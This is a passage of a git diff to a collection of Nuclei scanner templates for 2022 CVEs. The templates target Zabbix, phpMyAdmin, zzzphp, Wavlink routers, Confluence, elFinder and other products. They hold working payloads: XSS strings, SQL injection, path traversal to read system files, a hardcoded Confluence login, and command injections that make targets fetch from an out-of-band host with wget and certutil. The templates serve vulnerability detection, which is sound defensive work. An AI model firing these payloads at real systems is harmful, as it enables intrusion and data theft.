the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability. reference: - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 + - https://support.zabbix.com/browse/ZBX-20384 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/ + - https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2022-23134 - tags: cve,cve2022,zabbix,auth-bypass + cwe-id: CWE-287,CWE-284 + epss-score: 0.34559 + epss-percentile: 0.9671 + cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: zabbix + product: zabbix + tags: cve,cve2022,zabbix,auth-bypass,kev -requests: +http: - method: GET path: - "{{BaseURL}}/zabbix/setup.php" - "{{BaseURL}}/setup.php" + stop-at-first-match: true + headers: Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D" - stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -34,8 +50,15 @@ requests: - "Zabbix" condition: and + - type: word + words: + - "youtube_main" + - "support.google.com" + part: header + condition: and + negative: true + - type: status status: - 200 - -# Enhanced by mp on 2022/03/08 +# digest: 4b0a00483046022100e3fc17a46e63c043d37b84890ff55c7d3cf5f647c2885dc0484de21ac8fa5e260221008dda794693c6d89940aba0647527871cf1b59f9a8ac10fbeacf5f725abb667a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23178.yaml b/nuclei-templates/CVE-2022/cve-2022-23178.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23178.yaml rename to nuclei-templates/CVE-2022/cve-2022-23178.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23347.yaml b/nuclei-templates/CVE-2022/cve-2022-23347.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23347.yaml rename to nuclei-templates/CVE-2022/cve-2022-23347.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23779.yaml b/nuclei-templates/CVE-2022/cve-2022-23779.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23779.yaml rename to nuclei-templates/CVE-2022/cve-2022-23779.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-23808.yaml b/nuclei-templates/CVE-2022/cve-2022-23808.yaml new file mode 100644 index 0000000000..4d9d63a2b9 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23808.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-23808 + +info: + name: phpMyAdmin < 5.1.2 - Cross-Site Scripting + author: cckuailong,daffainfo + severity: medium + description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. + remediation: | + Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability. + reference: + - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A + - https://github.com/dipakpanchal456/CVE-2022-23808 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 + - https://www.phpmyadmin.net/security/PMASA-2022-2/ + - https://infosecwriteups.com/exploit-cve-2022-23808-85041c6e5b97 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-23808 + cwe-id: CWE-79 + epss-score: 0.00743 + epss-percentile: 0.78912 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: phpmyadmin + product: phpmyadmin + shodan-query: http.component:"phpmyadmin" + tags: cve,cve2022,phpmyadmin,xss + +http: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\">" + - "

Add a new server

" + - "phpMyAdmin setup" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022038d5ba39a2b759095a3f8426c738ce15cf6c83b54e32b080e617ac13d733503a022100e570ecb30aa4d1b1fe02f8867294888554e1bb76b68135ab78cb7e93cf859e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-23881.yaml b/nuclei-templates/CVE-2022/cve-2022-23881.yaml new file mode 100644 index 0000000000..31184f0103 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23881.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-23881 + +info: + name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution + author: pikpikcu + severity: critical + description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp. + reference: + - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md + - http://www.zzzcms.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23881 + cwe-id: CWE-77 + epss-score: 0.16723 + epss-percentile: 0.95904 + cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zzzcms + product: zzzphp + tags: cve,cve2022,rce,zzzphp,zzzcms + +http: + - raw: + - | + GET /?location=search HTTP/1.1 + Host: {{Hostname}} + Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 +# digest: 490a0046304402206e4532e227dccab23d15511e741d5332c04c553aec092af6b3f824278ebd18c9022064325bd4ae46cc3b31537d917d6159428ee7cfe953375bb53aac8c2024b8ae2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24112.yaml b/nuclei-templates/CVE-2022/cve-2022-24112.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-24112.yaml rename to nuclei-templates/CVE-2022/cve-2022-24112.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-24124.yaml b/nuclei-templates/CVE-2022/cve-2022-24124.yaml deleted file mode 100644 index f940ce92b6..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-24124.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-24124 - -info: - name: Casdoor 1.13.0 - Unauthenticated SQL Injection - author: cckuailong - severity: high - description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. - reference: - - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html - - https://www.exploit-db.com/exploits/50792 - - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget - - https://nvd.nist.gov/vuln/detail/CVE-2022-24124 - metadata: - product: https://casdoor.org/ - shodan-query: http.title:"Casdoor" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-24124 - cwe-id: CWE-89 - tags: cve,cve2022,casdoor,sqli,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "XPATH syntax error.*'" - - "casdoor" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24260.yaml b/nuclei-templates/CVE-2022/cve-2022-24260.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-24260.yaml rename to nuclei-templates/CVE-2022/cve-2022-24260.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-24681.yaml b/nuclei-templates/CVE-2022/cve-2022-24681.yaml new file mode 100644 index 0000000000..1cd1c7e9e0 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24681.yaml @@ -0,0 +1,62 @@ +id: CVE-2022-24681 + +info: + name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting + author: Open-Sec + severity: medium + description: | + ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary scripts or theft of sensitive information. + remediation: | + Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability. + reference: + - https://raxis.com/blog/cve-2022-24681 + - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html + - https://manageengine.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 + - https://www.manageengine.com/products/self-service-password/kb/CVE-2022-24681.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24681 + cwe-id: CWE-79 + epss-score: 0.00155 + epss-percentile: 0.51848 + cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zohocorp + product: manageengine_adselfservice_plus + tags: cve,cve2022,manageengine,xss,authenticated,zohocorp + +http: + - raw: + - | + POST /servlet/GetProductVersion HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(buildnumber, '< 6121') + + - type: word + part: body + words: + - "ManageEngine" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: buildnumber + group: 1 + regex: + - '"BUILD_NUMBER":"([0-9]+)",' + internal: true + part: body +# digest: 4a0a00473045022100bb98caa57ec6e3ed65dcc5cfbfe03e4b587538e5e968b2097fac7c24343595bf022024df61662ad6dcdb68cd5e6cc916990b9854a8d8e027ac7f1651aee87880932c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-2488.yaml b/nuclei-templates/CVE-2022/cve-2022-2488.yaml new file mode 100644 index 0000000000..3f428bc088 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-2488.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-2488 + +info: + name: Wavlink WN535K2/WN535K3 - OS Command Injection + author: For3stCo1d + severity: critical + description: | + Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + reference: + - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 + - https://vuldb.com/?id.204539 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2488 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2488 + cwe-id: CWE-78 + epss-score: 0.97392 + epss-percentile: 0.99908 + cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn535k2_firmware + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2022,iot,wavlink,router,rce,oast + +http: + - raw: + - | + GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 500 +# digest: 4a0a004730450220356cde1b887b5746d09e420786e7774b8306e1e99f930120cb47996c24a275b2022100a3c3b2747f775e12938742f69218d9d03766d557418c26f563d6c42da95b6326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-24899.yaml b/nuclei-templates/CVE-2022/cve-2022-24899.yaml new file mode 100644 index 0000000000..ec78a7b42d --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24899.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-24899 + +info: + name: Contao <4.13.3 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: As a workaround, users may disable canonical tags in the root page settings. + reference: + - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ + - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24899 + - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html + - https://github.com/contao/contao/commit/199206849a87ddd0fa5cf674eb3c58292fd8366c + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24899 + cwe-id: CWE-79 + epss-score: 0.00342 + epss-percentile: 0.70926 + cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: contao + product: contao + shodan-query: title:"Contao" + tags: cve,cve2022,contao,xss,huntr + +http: + - method: GET + path: + - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"></script><script>alert(document.domain)</script>' + - '"Not authenticated"' + condition: and + + - type: word + part: header + words: + - text/html +# digest: 4b0a00483046022100dd79aa0474a89a2ac03e8147296d8958bd8863792570ee2d226ce4ef2bb5fe47022100f21bdc20c0df7169bf401f396d4d70048dddd98be918337c91d990bd543060b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24990.yaml b/nuclei-templates/CVE-2022/cve-2022-24990.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-24990.yaml rename to nuclei-templates/CVE-2022/cve-2022-24990.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-25216.yaml b/nuclei-templates/CVE-2022/cve-2022-25216.yaml index adef971fa1..e76bdcc221 100644 --- a/nuclei-templates/CVE-2022/cve-2022-25216.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-25216.yaml @@ -1,21 +1,34 @@ id: CVE-2022-25216 info: - name: DVDFab 12 Player/PlayerFab - Arbitrary File Read + name: DVDFab 12 Player/PlayerFab - Local File Inclusion author: 0x_Akoko severity: high - description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access + description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access. + impact: | + The vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure. + remediation: | + Apply the latest patch or update from the vendor to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2022-07 - - https://www.cvedetails.com/cve/CVE-2022-25216 + - https://nvd.nist.gov/vuln/detail/CVE-2022-25216 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25216 cwe-id: CWE-22 - tags: cve,cve2022,dvdFab,lfi,lfr + epss-score: 0.01345 + epss-percentile: 0.85828 + cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dvdfab + product: 12_player + tags: cve,cve2022,dvdFab,lfi,lfr,tenable,dvdfab -requests: +http: - method: GET path: - "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini" @@ -33,3 +46,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402203f6ae7c1e6a044dfb0d2128ba0584e801d970fb9556d08d9a0525a2a896768f502202d00ccb4c7597331865d1c3b386225396ccb8816353db36cda136dc03489c824:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-25323.yaml b/nuclei-templates/CVE-2022/cve-2022-25323.yaml new file mode 100644 index 0000000000..ebf9e285b9 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-25323.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-25323 + +info: + name: ZEROF Web Server 2.0 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. + reference: + - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 + - https://awillix.ru + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/awillix/research + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-25323 + cwe-id: CWE-79 + epss-score: 0.00115 + epss-percentile: 0.45093 + cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zerof + product: web_server + tags: cve,cve2022,xss,zerof + +http: + - method: GET + path: + - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'back<img src=x onerror=alert(document.domain)>' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 401 +# digest: 4a0a00473045022100e86147269d500eee87a76dc8b3d4d6b539f23c5c25293ad044322e223159453702203e3e862ec74768390d0b5445cfb478c43678e1e7109cd2e1d3f97e9bb17fdd90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-26134.yaml b/nuclei-templates/CVE-2022/cve-2022-26134.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-26134.yaml rename to nuclei-templates/CVE-2022/cve-2022-26134.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-26135.yaml b/nuclei-templates/CVE-2022/cve-2022-26135.yaml deleted file mode 100644 index 6ec4be4593..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-26135.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2022-26135 - -info: - name: Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server - author: dk4trin - severity: high - description: A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4. - reference: - - https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html - - https://github.com/assetnote/jira-mobile-ssrf-exploit - classification: - cvss-score: 7.5 - cve-id: CVE-2020-14179 - tags: cve,cve2022,atlassian,jira,ssrf - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/Signup!default.jspa" - - matchers-condition: and - matchers: - - type: word - words: - - "Email" - - "Username" - - "Password" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-26138.yaml b/nuclei-templates/CVE-2022/cve-2022-26138.yaml index 03523083c2..10f5282faf 100644 --- a/nuclei-templates/CVE-2022/cve-2022-26138.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-26138.yaml @@ -6,21 +6,32 @@ info: severity: critical description: | Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Confluence instance. + remediation: | + Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials. reference: - https://twitter.com/fluepke/status/1549892089181257729 - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html - https://nvd.nist.gov/vuln/detail/CVE-2022-26138 + - https://jira.atlassian.com/browse/CONFSERVER-79483 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26138 cwe-id: CWE-798 + epss-score: 0.97262 + epss-percentile: 0.99834 + cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: atlassian + product: questions_for_confluence shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2022,confluence,atlassian,default-login,kev + tags: cve2022,cve,confluence,atlassian,default-login,kev -requests: +http: - raw: - | POST /dologin.action HTTP/1.1 @@ -29,16 +40,14 @@ requests: os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action - attack: pitchfork payloads: os_username: - disabledsystemuser os_password: - disabled1system1user6708 - + attack: pitchfork matchers: - type: dsl dsl: - 'location == "/httpvoid.action"' - -# Enhanced by md on 2023/01/06 +# digest: 4a0a004730450220422bbf1147e32d7098167fda41b6ebbbab0fb1a33273478a0fe42870a6364d550221009183ec3599722164f7c06a16c6983fbd3faab1b36f05b0913935b8d6339e5f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-26233.yaml b/nuclei-templates/CVE-2022/cve-2022-26233.yaml new file mode 100644 index 0000000000..5ac643025e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26233.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-26233 + +info: + name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion + author: 0x_Akoko + severity: high + description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability. + reference: + - https://0day.today/exploit/37579 + - http://seclists.org/fulldisclosure/2022/Apr/0 + - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26233 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-26233 + cwe-id: CWE-22 + epss-score: 0.00654 + epss-percentile: 0.77223 + cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: barco + product: control_room_management_suite + tags: cve,cve2022,barco,lfi,seclists,packetstorm + +http: + - raw: + - |+ + GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and +# digest: 4a0a00473045022100daa8547f82c8615b2d03d8541ff37de1f91c24cf042872c4954ab90b80af5a050220345d77954918025528c4ca7435b98169569b646c348d133e3290273d1c16e42d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-26960.yaml b/nuclei-templates/CVE-2022/cve-2022-26960.yaml new file mode 100644 index 0000000000..e231a5d9bb --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26960.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-26960 + +info: + name: elFinder <=2.1.60 - Local File Inclusion + author: pikpikcu + severity: critical + description: | + elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. + remediation: | + Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability. + reference: + - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html + - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db + - https://www.synacktiv.com/publications.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2022-26960 + cwe-id: CWE-22 + epss-score: 0.85922 + epss-percentile: 0.98481 + cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: std42 + product: elfinder + tags: cve2022,cve,lfi,elfinder,std42 + +http: + - raw: + - | + GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100b51a2dee0a9598c7c1f521f9373c5bb35728dda0693010a4db82ab044f7124d4022006a5200a4741c2b9c8d1102b86fd448d48abe1e0af4e543f0ea00920ed47e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-27849.yaml b/nuclei-templates/CVE-2022/cve-2022-27849.yaml deleted file mode 100644 index d52f9a2027..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-27849.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-27849 - -info: - name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability - author: random-robbie - severity: high - description: | - WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it. - reference: - - https://wordpress.org/plugins/simple-ajax-chat/#developers - - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability - - https://nvd.nist.gov/vuln/detail/CVE-2022-27849 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-27849 - cwe-id: CWE-200 - metadata: - google-query: inurl:/wp-content/plugins/simple-ajax-chat/ - tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"Chat Log"' - - '"User IP"' - - '"User ID"' - condition: and - - - type: word - part: header - words: - - text/csv - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-28079.yaml b/nuclei-templates/CVE-2022/cve-2022-28079.yaml new file mode 100644 index 0000000000..111b5db77c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28079.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-28079 + +info: + name: College Management System 1.0 - SQL Injection + author: ritikchaddha + severity: high + description: | + 